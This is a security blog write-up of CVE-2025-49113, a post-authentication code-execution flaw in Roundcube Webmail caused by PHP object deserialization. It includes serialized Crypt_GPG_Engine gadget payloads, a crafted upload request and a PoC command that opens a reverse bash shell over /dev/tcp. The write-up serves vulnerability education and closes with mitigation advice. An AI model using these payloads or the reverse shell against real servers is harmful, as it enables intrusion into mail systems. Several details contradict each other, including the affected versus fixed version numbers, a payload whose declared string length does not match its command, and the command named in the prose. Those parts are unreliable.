CVE-2025-49113 | Roundcube Post-Auth RCE via PHP Object Deserialization

Exploiting CVEs
September 12, 2025

Summary

CVE-2025-49113 is a Post-Authentication Remote Code Execution (RCE) vulnerability in Roundcube Webmail, one of the most widely used open-source webmail clients written in PHP. The vulnerability arises due to unsafe PHP object deserialization, allowing an authenticated attacker to execute arbitrary code on the server.

Assigned a CVSSv3 base score of 8.8 (High), this vulnerability impacts Roundcube versions prior to 1.6.5 and 1.5.6, and poses a significant threat in environments where authenticated access is attainable — such as multi-user or shared hosting scenarios.

Technical Details

Roundcube is a web-based email client that supports a modular plugin architecture. This plugin system allows developers to enhance or modify the behavior of Roundcube by hooking into events, modifying views, or storing custom data.

To preserve the state and context of these plugins across user sessions (i.e., from one request to another), Roundcube often needs to store complex PHP objects temporarily, especially when:

  • Storing plugin-specific user preferences
  • Managing session state
  • Passing plugin context between components

To store these objects efficiently, PHP serialization is used — converting PHP objects into a string format that can be saved and later restored using serialize() and unserialize() functions.

What Is PHP Object Deserialization?

Serialization is a way of converting complex objects (like arrays or custom classes) into a string so they can be stored in sessions or files. Deserialization is the reverse process — taking that string and converting it back into a live PHP object.

If an attacker can supply their own serialized string, and that string gets unserialized without proper validation, it can be exploited to perform dangerous actions, especially if the application has classes with magic methods like:

  • __wakeup()
  • __destruct()
  • __call()

These methods automatically execute when the object is deserialized or destroyed — making them "gadgets" in exploitation chains.

What Went wrong in RoundCube?

Roundcube allows users to upload files, such as avatars or signature images, through the settings interface. When handling these uploads, Roundcube expects a GET parameter called _from, which identifies the upload context (e.g., add-avatar, edit-signature).

Here’s a simplified snippet of how Roundcube processes the uploaded file:


$from = rcube_utils::get_input_string('_from', INPUT_GET);
$type = preg_replace('/(add|edit)-/', '', $from);
$type = str_replace('.', '-', $type);

$rcmail->session->append($type . '.files', $id, $attachment);

  • The _from value is directly used to construct session keys such as avatar.files.
  • The resulting $type (e.g., avatar) becomes part of the session variable key.
  • These session variables are serialized and stored server-side.

The problem arises when the _from parameter is manipulated in a specific way to inject malicious serialized payloads into the session, which are later unconditionally deserialized upon reloading the session — enabling exploitation.

PHP uses serialize() and unserialize() functions to manage complex session data, such as objects and arrays. Roundcube internally stores user session data using a custom serializer that formats session keys and values like this:


foreach ($vars as $var => $value) {
    $data .= $var . '|' . serialize($value);
}

This format is then parsed using PHP’s session_decode() during login or request initialization. If an attacker can insert a forged session variable string like:


malicious_key|O:8:"EvilClass":1:{s:4:"prop";s:13:"touch /tmp/RCE";}

…then unserialize() will instantiate an object of type EvilClass and assign prop = "touch /tmp/RCE". If EvilClass implements __destruct() or __wakeup() methods, PHP will automatically execute them — without any validation.

This becomes dangerous when a built-in or bundled class contains a destructor that executes system commands, such as with proc_open().

Exploitation

Roundcube includes the PEAR library Crypt_GPG, whose internal class Crypt_GPG_Engine has a destructor that calls proc_open() using the private property $_gpgconf.


private function _closeIdleAgents() {
  if ($this->_gpgconf && is_executable($this->_gpgconf)) {
    $cmd = $this->_gpgconf . ' --kill gpg-agent';
    proc_open($cmd, ...);
  }
}

An attacker can instantiate this class via deserialization with a custom $_gpgconf value pointing to any executable shell command.

Serialized payload: 


O:16:"Crypt_GPG_Engine":1:{
  S:26:"\0Crypt_GPG_Engine\0_gpgconf";
  S:18:"touch /tmp/RCE";
}

This payload creates an object where the private member _gpgconf is set to "touch /tmp/pwned". When the object is destroyed (e.g., at the end of a request), the proc_open() is triggered, resulting in command execution.

To abuse this, the attacker:

  • Needs to have a valid set of credentials to log in to Roundcube.
  • Uploads a file via the settings page using a crafted _from parameter containing malicious session key injections.
  • The session stores the serialized payload, and it’s later deserialized in future requests.

Example HTTP POST Request to upload file:


POST /?_task=settings&_action=upload&_from=edit-!;O:16:"Crypt_GPG_Engine":1:{S:26:"\0Crypt_GPG_Engine\0_gpgconf";s:18:"touch /tmp/RCE";}
Content-Type: multipart/form-data; boundary=----boundary

------boundary
Content-Disposition: form-data; name="_file[]"; filename="x.png"
Content-Type: image/png

*file content here*
------boundary--

This injects a session key like: 


files|O:16:"Crypt_GPG_Engine":1:{S:26:"\0Crypt_GPG_Engine\0_gpgconf";s:18:"touch /tmp/RCE";}

On the next page load or settings refresh:

  • Roundcube restores session state via session_decode().
  • The malicious object is deserialized.
  • The destructor is automatically invoked.
    proc_open() is executed with attacker-supplied command → RCE achieved.

A working exploit for CVE-2025-49113 has been released publicly by the Fearsoff team and can be found on GitHub:

PoC URL:
 https://raw.githubusercontent.com/fearsoff-org/CVE-2025-49113/refs/heads/main/CVE-2025-49113.php

You can run the exploit using PHP CLI with the following syntax:


php CVE-2025-49113.php http://:/   "bash -c 'bash -i >& /dev/tcp// 0>&1'"

Mitigation

  • The Roundcube development team has released patches addressing this vulnerability:
    Fixed in versions:
    • 1.6.11
    • 1.5.10
  • Use a hardened deserialization handler that checks object types before allowing them to be unserialized.

Reference

https://fearsoff.org/research/roundcube

Related posts :

Exploiting CVEs

Exploiting CVEs
September 12, 2025

CVE-2025-49113 | Roundcube Post-Auth RCE via PHP Object Deserialization

CVE-2025-49113 is a Post-Authentication Remote Code Execution (RCE) vulnerability in Roundcube Webmail, one of the most widely used open-source webmail clients written in PHP. The vulnerability arises due to unsafe PHP object deserialization, allowing an authenticated attacker to execute arbitrary code on the server.
Read More
Exploiting CVEs
August 14, 2025

CVE-2021-29447 | WordPress Media Library XXE

CVE-2021-29447 is an Authenticated XML External Entity (XXE) vulnerability exploitable in WordPress versions 5.6 to 5.7.1. The issue affects the Media Library, which allows authenticated users (like contributors or authors) to upload media files.
Read More
Exploiting CVEs
September 9, 2025

CVE-2024-45195: Apache OFBiz Unauthenticated Remote Code Execution (RCE)

CVE-2024-45195 is a critical vulnerability in Apache OFBiz, a widely used open-source enterprise resource planning (ERP) system with a CVSS score of 7.5 by NVD. The flaw enables unauthenticated remote code execution (RCE) due to an insecure use of Java's scripting engine within the web application's request handling logic. This exploit bypasses previously issued patches (CVE‑2024‑32113, ‑36104, ‑38856)
Read More
Web App Security
Web App Security
November 21, 2017

BurpSuite – Swiss Knife for penetration testers

Welcome back everyone to this very new blog post. There are so many different tools and applications for pentesters but …
Read More
Web App Security
January 25, 2018

How to exploit XXE vulnerabilities?

Hi everyone. In this blog, we are going to discuss a critical web application vulnerability known as XML External Entity vulnerability also known as XXE. XXE is at the 4th …
Read More
Web App Security
November 21, 2017

Common security issues in Authentication – Part 2

Welcome everyone to this second and final post of authentication testing series. In the first part, we saw the 4 major …
Read More

Mobile App Security

Mobile App Security
April 17, 2022

An analysis of the modern mobile applications for data security

Mobile phones have become an imperative portion of our daily lives. People nowadays prefer to keep every bit of information regarding personal and professional life on their mobile phones.
Read More
Mobile App Security
May 21, 2019

Mobexler : A Mobile Application Security Testing Platform

Mobexler is a Mobile Application Penetration Testing Platform, customised to include all tools required for penetration ...
Read More
Mobile App Security
July 2, 2023

Exploring Android Security: Safeguarding The Droid

The Android architecture implements different security layers that, together, enable a defense-in-depth approach. This means that the confidentiality, integrity or availability of sensitive user-data doesn't hinge on one single security measure.
Read More
An Award-Winning Cyber Security Consulting & Training Company
Email
Headquarter
Enciphers Labs Private Limited,
24th Floor, Tower B, Alphathum, Sector 90, Noida, Uttar Pradesh, India
Company
About usContact UsServicesTrainingBrand Kit
Useful links
Cyber Security PolicyData Protection PolicyResponsible DisclosurePrivacy PolicyHall Of Fame
© 2000-2022, All Rights Reserved

By clicking “Accept”, you agree to the storing of cookies on your device to enhance site usage. View our Privacy Policy for more information.

RejectAccept